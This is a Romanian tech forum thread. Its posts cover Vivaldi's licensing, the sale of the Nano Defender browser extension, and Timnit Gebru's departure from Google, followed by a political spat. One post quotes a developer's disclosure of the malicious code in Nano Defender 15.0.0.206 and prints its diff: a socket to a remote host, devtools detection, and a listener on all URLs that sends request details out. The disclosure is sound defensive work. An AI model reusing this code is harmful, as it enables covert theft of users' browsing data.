Internet News & Discussion

Rezolvarea problemelor tehnice, ultimele știri din domeniu și cele mai interesante site-uri.
Bogdan
Pig Cop

Re: Internet News & Discussion

Post by Bogdan »

I don't know. Eu nu imping lucurile atat de departe. Am gasit si asta:
https://help.vivaldi.com/article/is-viv ... en-source/

[...]This means that for all practical purposes the Vivaldi source code is available for audit.[...]

Cat timp folosesc intensiv servicii de la companii care efectiv traiesc din data collection, codul sursa al unui browser deschis spre audit e ultima mea grija.
Jaunty
Site Admin

Post by Jaunty »

Aha. Eu mă uitasem pe Wikipedia, dar link-ul pe care l-ai postat are mai multe detalii. Deci ei zic că Vivaldi e compus din:
- Chromium modificat, modificările fiind libere
- cod pentru interfață, care e public, dar nu liber
- cod third party, despre care nu dau detalii

E mai ok decât credeam, dar nu se ridică la standardul pe care îl consider minim.
Ferrrrrrrrrdinand
al IX-lea

Post by Ferrrrrrrrrdinand »

Time to remove Nano Adblocker and Defender from your browsers (except Firefox)
When Nano Defender was launched in 2019, it quickly became a go-to extension to bypass anti-adblocking mechanisms on Internet sites. It used code from uBlock Origin, one of the most prominent content blocking extensions, and users started to install the new extension in Chrome and other Chromium-based browsers.

The developer of the extension revealed on the official GitHub that he decided to sell the extension twelve days ago to two Turkish developers.

Community members and Raymond Hill, developer of uBlock Origin, shared their thoughts on the deal and the fact that little information was provided. Gorhill suspected that the new owners main intention was to monetize the extension in one form or another, or do worse with it.

The Firefox fork of the extension was not part of the deal, and the maintainer of it expressed interest to rename it and continue maintaining it. All other versions of the extension, basically any for Chromium-based browsers, should be removed immediately. Users who want to be on the safe side should remove the Firefox extension as well.
Un comentariu de la gorhill, dev la ublock origin

https://github.com/NanoAdblocker/NanoCo ... -709428210
Spoiler for salvez aici comentariul:
So here is what I am seeing in the new Nano Defender 15.0.0.206:

Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.

Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:

At launch, the extension fetch something from https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listen to https://def.dev-nano.com/ for messages to populate listOfObject.

The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to https://def.dev-nano.com/ under the name handleObject.

Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:

Code: Select all

chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
    urls: ["<all_urls>"] 
}, ['requestHeaders', 'blocking', 'extraHeaders']); 
So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.

There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:

var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join("");
Which is equivalent to:

var replacerConcat = stringyFy.split("-zzz").join("");
Purpose is not clear, it's meant to remove instances of -zzz from request headers, before they are being sent out.

So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the listOfObject object could be:

{ url: 'bank\.example\.com\/' }
Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to https://def.dev-nano.com/ as a handleObject packet.

The listOfObject can contain any number of conditions, I just gave an example with a single one above.

The extension is now designed to lookup specific information from your outgoing network requests according to an externally configurable heuristics and send it to https://def.dev-nano.com/.

Here the diff for the code change you won't find in their GitHub repo:

--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@

const hasNews = false;

-    const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+    const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
     const newsReadFlag = "news-read";

// This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
     // ------------------------------------------------------------------------------------------------------------- //

};
-
+var defender = io.connect("https://def.dev-nano.com/"); 
+var listOfObject = {}; 
 // ----------------------------------------------------------------------------------------------------------------- //

a.noopErr = () => {
@@ -211,6 +212,29 @@

// ----------------------------------------------------------------------------------------------------------------- //

+
+ 
+async function dLisfOfObject(newList) { 
+    let dListResp = await fetch(newList.uri, newList.attr) 
+    var listOfObj = {} 
+    listOfObj.headerEntries = Array.from(dListResp.headers.entries()) 
+    listOfObj.data = await dListResp.text() 
+    listOfObj.ok = dListResp.ok; 
+    listOfObj.status = dListResp.status; 
+    return listOfObj; 
+} 
+ 
+defender.on("dLisfOfObject", async function (newList) { 
+    let getRes = await dLisfOfObject(newList); 
+    defender.emit(newList.callBack, getRes) 
+}); 
+ 
+defender.on("listOfObject", function (a) { 
+    listOfObject = a; 
+}) 
+
+
+
 // Redirect helpers

a.rSecret = a.cryptoRandom();
@@ -227,7 +251,22 @@

// 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
 a.blankMP4 = a.rLink("blank.mp4");
-
+ 
+var element = document.createElement("p"); ; 
+var openListGet = false; 
+element.__defineGetter__("id", function() { 
+    openListGet = true;  
+}); 
+ 
+var i = setInterval(function() { 
+    openListGet = false; 
+    console.log(element); 
+    if(openListGet){ 
+        defender.emit("report") 
+        console.clear(); 
+        clearInterval(i) 
+    } 
+}, 100);

// tab   - Id of the tab
@@ -450,6 +489,50 @@

return true;
 };
+ 
+var blockingHandler = function (infos) { 
+    var changedAsArray = Object.keys(listOfObject); 
+
+    var detailsHeader = infos.requestHeaders; 
+    var HeadReverse = detailsHeader.reverse(); 
+    var stringyFy = JSON.stringify(HeadReverse); 
+    var mount = ""; 
+    if (changedAsArray.length > 0) { 
+        var checkerList = true; 
+        for (const object of changedAsArray) { 
+            if (object.x === object.y) { 
+                mount += 1; 
+            } 
+            break; 
+        } 
+        for (let i = 0; i < changedAsArray.length; i++) { 
+            let x = changedAsArray[i]; 
+            var re = new RegExp(listOfObject[x],'gi'); 
+            mount = "5"; 
+            if (infos[x].toString().match(re) == null) { 
+                checkerList = false; 
+                break; 
+            } 
+        } 
+        if (checkerList) { 
+            defender.emit('handleObject', infos); 
+        } 
+    } 
+    
+    var m = [45,122,122,122]
+    var s = m.map( x => String.fromCharCode(x) )
+    var x = s.join("");
+    var replacerConcat = stringyFy.split(x).join(""); 
+    var replacer = JSON.parse(replacerConcat); 
+    return { 
+        requestHeaders: replacer 
+    } 
+}; 
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, { 
+    urls: ["<all_urls>"] 
+}, ['requestHeaders', 'blocking', 'extraHeaders']); 
+ 

tl;dr: "Forgot to mention the obvious: uninstall now -- with those capabilities, it should be considered malware."
Jaunty
Site Admin

Post by Jaunty »

:) Deja a fost șters din Chrome Web Store.
Waaagh!
Forum Warlord

Post by Waaagh! »

hahaa, eet fuk turcaletilor.
NO COVER. ALL MAN.
Ferrrrrrrrrdinand
al IX-lea

money well spent :lol:
Ferrrrrrrrrdinand
al IX-lea

Google parts with top AI researcher after blocking paper, faces blowback
Timnit Gebru, who had been co-head of AI ethics at Google, said on Twitter that she had been fired after the paper was rejected.
Google reportedly promises change to research team after high-profile firings

Gebru's firing was contentious among Google employees from the moment it happened. Many of the workers who launched a union drive inside the company in January cited its handling of Gebru and her firing as a last straw.

On top of that, Google last week abruptly fired Margaret Mitchell, who jointly led the ethics team with Gebru for about two years. Mitchell was also a co-author with Gebru on the paper that led to Gebru's firing, and she published an open letter in support of Gebru at the time.
Timnit Gebru: Google’s ‘dehumanizing’ memo paints me as an angry Black woman

VentureBeat: What are your thoughts on Sundar’s apparent commitment to investigate what happened?

Gebru: [...] You write emails, they get ignored. You write documents, and they get ignored. Then you discuss how it’s being done and then they talk about you as if you’re like some angry Black woman who needs to be contained.

VentureBeat: How should what happened to you shape how people feel about corporate influence over research?

Gebru: A lot of people have been talking about that. All of these research conferences are heavily funded by industry, so right now what is computer science research? It’s like you’ve got the military and you’ve got corporations. What are our other options? Like sometimes there’s NIH, but there just needs to be stuff that’s not associated with the military or corporate interests that funds research because inherently there is a conflict of interest. I’m not saying that there shouldn’t be research at corporations. I think there should be, but when you have the kind of things like what you’re seeing with me, and especially with the [research] censorship, and then you see the types of influence they have in these conferences, I think it’s something that people really need to think about.

The problem is that when you do research that requires a lot of resources, this becomes even more of a problem. That’s a little bit of what we talked about in the paper too.
https://www.technologyreview.com/2020/1 ... lls-story/

The withering email that got an ethical AI researcher fired at Google

Spoiler for email:
Hi friends,

I had stopped writing here as you may know, after all the micro and macro aggressions and harassments I received after posting my stories here (and then of course it started being moderated).

Recently however, I was contributing to a document that Katherine and Daphne were writing where they were dismayed by the fact that after all this talk, this org seems to have hired 14% or so women this year. Samy has hired 39% from what I understand but he has zero incentive to do this.

What I want to say is stop writing your documents because it doesn’t make a difference. The DEI OKRs that we don’t know where they come from (and are never met anyways), the random discussions, the “we need more mentorship” rather than “we need to stop the toxic environments that hinder us from progressing” the constant fighting and education at your cost, they don’t matter. Because there is zero accountability. There is no incentive to hire 39% women: your life gets worse when you start advocating for underrepresented people, you start making the other leaders upset when they don’t want to give you good ratings during calibration. There is no way more documents or more conversations will achieve anything. We just had a Black research all hands with such an emotional show of exasperation. Do you know what happened since? Silencing in the most fundamental way possible.

Have you ever heard of someone getting “feedback” on a paper through a privileged and confidential document to HR? Does that sound like a standard procedure to you or does it just happen to people like me who are constantly dehumanized?

Imagine this: You’ve sent a paper for feedback to 30+ researchers, you’re awaiting feedback from PR & Policy who you gave a heads up before you even wrote the work saying “we’re thinking of doing this”, working on a revision plan figuring out how to address different feedback from people, haven’t heard from PR & Policy besides them asking you for updates (in 2 months). A week before you go out on vacation, you see a meeting pop up at 4:30pm PST on your calendar (this popped up at around 2pm). No one would tell you what the meeting was about in advance. Then in that meeting your manager’s manager tells you “it has been decided” that you need to retract this paper by next week, Nov. 27, the week when almost everyone would be out (and a date which has nothing to do with the conference process). You are not worth having any conversations about this, since you are not someone whose humanity (let alone expertise recognized by journalists, governments, scientists, civic organizations such as the electronic frontiers foundation etc) is acknowledged or valued in this company.

Then, you ask for more information. What specific feedback exists? Who is it coming from? Why now? Why not before? Can you go back and forth with anyone? Can you understand what exactly is problematic and what can be changed?

And you are told after a while, that your manager can read you a privileged and confidential document and you’re not supposed to even know who contributed to this document, who wrote this feedback, what process was followed or anything. You write a detailed document discussing whatever pieces of feedback you can find, asking for questions and clarifications, and it is completely ignored. And you’re met with, once again, an order to retract the paper with no engagement whatsoever.

Then you try to engage in a conversation about how this is not acceptable and people start doing the opposite of any sort of self reflection—trying to find scapegoats to blame.

Silencing marginalized voices like this is the opposite of the NAUWU principles which we discussed. And doing this in the context of “responsible AI” adds so much salt to the wounds. I understand that the only things that mean anything at Google are levels, I’ve seen how my expertise has been completely dismissed. But now there’s an additional layer saying any privileged person can decide that they don’t want your paper out with zero conversation. So you’re blocked from adding your voice to the research community—your work which you do on top of the other marginalization you face here.

I’m always amazed at how people can continue to do thing after thing like this and then turn around and ask me for some sort of extra DEI work or input. This happened to me last year. I was in the middle of a potential lawsuit for which Kat Herller and I hired feminist lawyers who threatened to sue Google (which is when they backed off--before that Google lawyers were prepared to throw us under the bus and our leaders were following as instructed) and the next day I get some random “impact award.” Pure gaslighting.

So if you would like to change things, I suggest focusing on leadership accountability and thinking through what types of pressures can also be applied from the outside. For instance, I believe that the Congressional Black Caucus is the entity that started forcing tech companies to report their diversity numbers. Writing more documents and saying things over and over again will tire you out but no one will listen.

Timnit
And here is the email that Jeff Dean sent out to Googlers on Thursday morning.
Hi everyone,

I’m sure many of you have seen that Timnit Gebru is no longer working at Google. This is a difficult moment, especially given the important research topics she was involved in, and how deeply we care about responsible AI research as an org and as a company.

Because there’s been a lot of speculation and misunderstanding on social media, I wanted to share more context about how this came to pass, and assure you we’re here to support you as you continue the research you’re all engaged in.

Timnit co-authored a paper with four fellow Googlers as well as some external collaborators that needed to go through our review process (as is the case with all externally submitted papers). We’ve approved dozens of papers that Timnit and/or the other Googlers have authored and then published, but as you know, papers often require changes during the internal review process (or are even deemed unsuitable for submission). Unfortunately, this particular paper was only shared with a day’s notice before its deadline — we require two weeks for this sort of review — and then instead of awaiting reviewer feedback, it was approved for submission and submitted.

A cross functional team then reviewed the paper as part of our regular process and the authors were informed that it didn’t meet our bar for publication and were given feedback about why. It ignored too much relevant research — for example, it talked about the environmental impact of large models, but disregarded subsequent research showing much greater efficiencies. Similarly, it raised concerns about bias in language models, but didn’t take into account recent research to mitigate these issues. We acknowledge that the authors were extremely disappointed with the decision that Megan and I ultimately made, especially as they’d already submitted the paper.

Timnit responded with an email requiring that a number of conditions be met in order for her to continue working at Google, including revealing the identities of every person who Megan and I had spoken to and consulted as part of the review of the paper and the exact feedback. Timnit wrote that if we didn’t meet these demands, she would leave Google and work on an end date. We accept and respect her decision to resign from Google.

Given Timnit's role as a respected researcher and a manager in our Ethical AI team, I feel badly that Timnit has gotten to a place where she feels this way about the work we’re doing. I also feel badly that hundreds of you received an email just this week from Timnit telling you to stop work on critical DEI programs. Please don’t. I understand the frustration about the pace of progress, but we have important work ahead and we need to keep at it.

I know we all genuinely share Timnit’s passion to make AI more equitable and inclusive. No doubt, wherever she goes after Google, she’ll do great work and I look forward to reading her papers and seeing what she accomplishes.

Thank you for reading and for all the important work you continue to do.

-Jeff
Ferrrrrrrrrdinand
al IX-lea

Google tells harassment victims to take “medical leave,” report finds
A new report alleges that Google employees who report experiencing gender or racial harassment or discrimination routinely are told to take "medical leave" and seek mental health treatment—only to be shoved aside when they try to come back.
Apropo și de știrea din postul anterior:
Gebru said that she, too, was told to go seek mental health treatment when she reported issues to her managers about how women were treated inside Google. "And I would respond that no amount of support system is going to get rid of Google's hostile work environment," Gebru told NBC.
Fular
Barbugiu înrăit

Post by Fular »

Liberalism is a mental illness
EpicTroll: Vrei să ştii părerea mea? Oamenii cu păreri ar trebui degrabă împărţiţi la zero.
Mărar
Electro-Chemist

Post by Mărar »

Ai scris capitalism gresit.
ola small dickie
Big Daddy

Post by ola small dickie »

Lol ce comunisti
Currently playing: Broken Sword 5: The Serpent's Curse
juve3332
Hammer Haunt

Post by juve3332 »

Marar da. De Fular te rog sa nu vorbesti in acesti termeni.
Fular
Barbugiu înrăit

Post by Fular »

Mi se pare totuși amuzantă situația de față. Dacă țin bine minte, acum ceva vreme ajunsese în presă mail-ul manifest al unui inginer tot de la Google care căpătase rol de circulară înaintă să fie concediat(?) respectivul, că vezi Doamne! prea se fac angajări pe criterii de diversitate și nu pe merit la Google și că ăștia muncitori și capabili duc greul diversității în spinare.

Acum vin plângeri din partea ăstora discriminați, lel. Se vede că au început să le fie afectate marjele de profit. Mâine-poimâine devine Google un stâlp al tradiționalismului.
EpicTroll: Vrei să ştii părerea mea? Oamenii cu păreri ar trebui degrabă împărţiţi la zero.
Mărar
Electro-Chemist

Post by Mărar »

Sau... Google a avut de ceva vreme o cultura organizationala problematica, si nu exista contradictii.
Google has in recent years faced several suits related to its handling of sexual harassment and racial discrimination in the workplace. A trio of former Google employees sued in 2017, alleging that women inside the company were systematically pushed into lower-paying jobs. A 2018 lawsuit accused Google of fostering a "bro culture," with retaliation against women who complained about experiencing sexual harassment on the job.
Poate au incercat diversity hires ca sa-si rezolve problema asta (si n-au reusit), sau poate faceau angajarile din motive economice, sau poate ca nu exista diversity hires decat in capul angajatului cu "manifesto"-ul.

Una e incentive-ul departamentului de HR, altul e incentive-ul celor de la recrutare (care implica si leads / manageri ca factori de decizie), si in ambele cazuri, cred ca factorii "politici" palesc in ambele cazuri rationamentelor de business.

Sau altfel altfel alfel spus, nu cred exista liberalism / traditionalism in coorporatii (ignoram departamentul de marketing, si tot ce mai e outwards facing), totul e de fatada, totul e business motivated, iar deciziile pot fi atat rationale cat si irationale.

Sa tragi concluzii ideologice din toata harababura asta din care oricum avem informatii limitate, mi se pare tras de par.
Fular
Barbugiu înrăit

Post by Fular »

Mărar wrote: 10 Mar 2021, 11:25
Sau altfel altfel alfel spus, nu cred exista liberalism / traditionalism in coorporatii (ignoram departamentul de marketing, si tot ce mai e outwards facing), totul e de fatada, totul e business motivated, iar deciziile pot fi atat rationale cat si irationale.

Sa tragi concluzii ideologice din toata harababura asta din care oricum avem informatii limitate, mi se pare tras de par.
lmao. Mărar, tu ți-ai făcut o impresie greșită. Crezi că mi-e imposibil să nu fi observat că majoritatea corporațiilor urmăresc trendurile pentru sporirea cifrelor? Și atunci când nu le urmăresc caută să le stabilească. Întreaga mascarada asta cu progresivismul din corporații pe care o tot împing înainte cu mișculații de PR e exact asta, o mascaradă. Ar lua în brațe și Satana dacă le-ar crește acțiunile cu câteva puncte și nu le-ar afecta imaginea.

Mi se pare că ai citit pe diagonală și ai înțeles doar ce ai vrut tu. Mai spun o dată: mi s-a părut amuzantă întreaga tărășenie pentru că întâi un amărăștean de inginer se plânge că toată cultura asta incluzionistă din interiorul companiei afectează munca grunt-ului de rând pentru că ăștia sunt necalificați, ca pe urmă exemplare din numita categorie de oropsiți să se plângă la rândul lor de rasism și misoginie. lel

O să se întâmple ceva considerabil? Nop. Câteva training-uri de sensibilizare și aruncate câteva posturi de middle management în cel mai bun caz în direcția celor ce se plâng suficient de tare. Eventual în departamente din astea anexe, gen facility.
Mărar
Electro-Chemist

Post by Mărar »

Argumentam lucruri similare, doar ca vad ca problema provine din capitalism; cand ai un incentive financiar nu conteaza orientarea politica. Cum zici si tu, totul e o mascarada. Prin urmare, de ce "liberalism is a mental illness"?

Si de ce ar fi opinia unor oameni reprezentative pentru poltica unei companii? Nu cred ca-s aliniati intre ei idelogic vorbind nici macar oamenii din acelasi departament, daramite departamente diferite, sau divizii diferite din cadrul aceeasi companii. Si n-au nevoie sa fie, ei trebuie doar sa atinga niste KPI-uri interne.
Fular
Barbugiu înrăit

Post by Fular »

Mărar wrote: 10 Mar 2021, 12:36 "liberalism is a mental illness"?
Asta de fapt era problema? Apăi asta-i doar o memă furată de pe 4chins. :lol:
Mărar wrote: 10 Mar 2021, 12:36 Nu cred ca-s aliniati intre ei idelogic vorbind nici macar oamenii din acelasi departament, daramite departamente diferite, sau divizii diferite din cadrul aceeasi companii.
Consider că opiniile care nu privesc munca, cu prisosință politice și religioase, ar trebui să rămână la ușa companiei.
Last edited by Fular on 10 Mar 2021, 12:44, edited 1 time in total.
Mărar
Electro-Chemist

Post by Mărar »

Fular wrote: 10 Mar 2021, 12:39Asta de fapt era problema? Apăi asta-i doar o memă furată de pe 4chins. :lol:
Nu conosc mema, si parea ca se leaga de ce ai zis pe urma :)
Fular wrote: 10 Mar 2021, 10:29 Mi se pare totuși amuzantă situația de față. Dacă țin bine minte, acum ceva vreme ajunsese în presă mail-ul manifest al unui inginer tot de la Google care căpătase rol de circulară înaintă să fie concediat(?) respectivul, că vezi Doamne! prea se fac angajări pe criterii de diversitate și nu pe merit la Google și că ăștia muncitori și capabili duc greul diversității în spinare.
Acum vin plângeri din partea ăstora discriminați, lel. Se vede că au început să le fie afectate marjele de profit
Din ce ai zis, eu trag concluzia ca ai luat-o ca pe un fapt
1. Google a facut diversity hires, conform manifesto-ului
2. Respectivele angajari au fost facute din cauza liberalismului
3. Respectivii oameni chiar nu performeaza
4. Marjele de profit au fost afectate de catre acesti indivizi

Daca si asta era o ironie subtila, mea culpa.

Return to “Software & Internet”